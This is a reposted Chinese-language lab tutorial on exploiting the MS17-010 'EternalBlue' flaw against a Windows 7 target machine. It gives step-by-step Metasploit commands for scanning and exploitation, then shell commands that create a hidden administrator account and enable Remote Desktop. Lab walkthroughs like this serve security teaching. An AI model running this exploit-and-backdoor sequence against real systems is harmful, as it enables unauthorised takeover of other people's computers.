利用"永恆之藍"漏洞 實現Windows Getshell 對靶機Win7進行控制


登錄kali 提升root權限

sudo su //提權root
kali //輸入密碼
cd ~ //切換根目錄

 ② 登錄Kali Linux,進入MSF框架,搜索ms17-010代碼

msfconsole  
msf > search ms17_010 

 

 

 

 ③ 使用ms17-010掃描模塊,對靶機Win7進行掃描

msf > use 1  //使用auxiliary/scanner/smb/smb_ms17_010掃描模塊  
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.127.131 //設置目標IP或網段  
msf auxiliary(smb_ms17_010) > run //執行掃描  

 

 

 從截圖可以看到,掃描模塊發現Win7存在漏洞風險

④ 使用ms17-010滲透模塊,對靶機Win7進行滲透

msf > use 2 //使用exploit/windows/smb/ms17_010_eternalblue滲透模塊 
msf exploit(ms17_010_eternalblue) > show options //查看可設置的選項  
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.127.131 //設置滲透目標ip  
msf exploit(ms17_010_eternalblue) > exploit //執行滲透 

 

 

 

 

 

 從最終效果來看,此時Kali Linux通過MS17-010滲透代碼,直接拿到Win7的Shell,之后便可以通過Shell對目標靶機WIN7進行控制。

⑤ 通過Shell對靶機Win7進行控制

net user xxxx xxxx /add //創建用戶名密碼xxxx/xxxx
net localgroup administrators xxxx /add //將用戶xxxx添加入管理組
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f   //開啟遠程桌面功能 
rdesktop 192.168.127.131:3389 //Kali遠程桌面連接Win7

 

 

 

 

可以看到,最終Kali通過shell新建了用戶,並通過遠程桌面連接到目標靶機上.

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM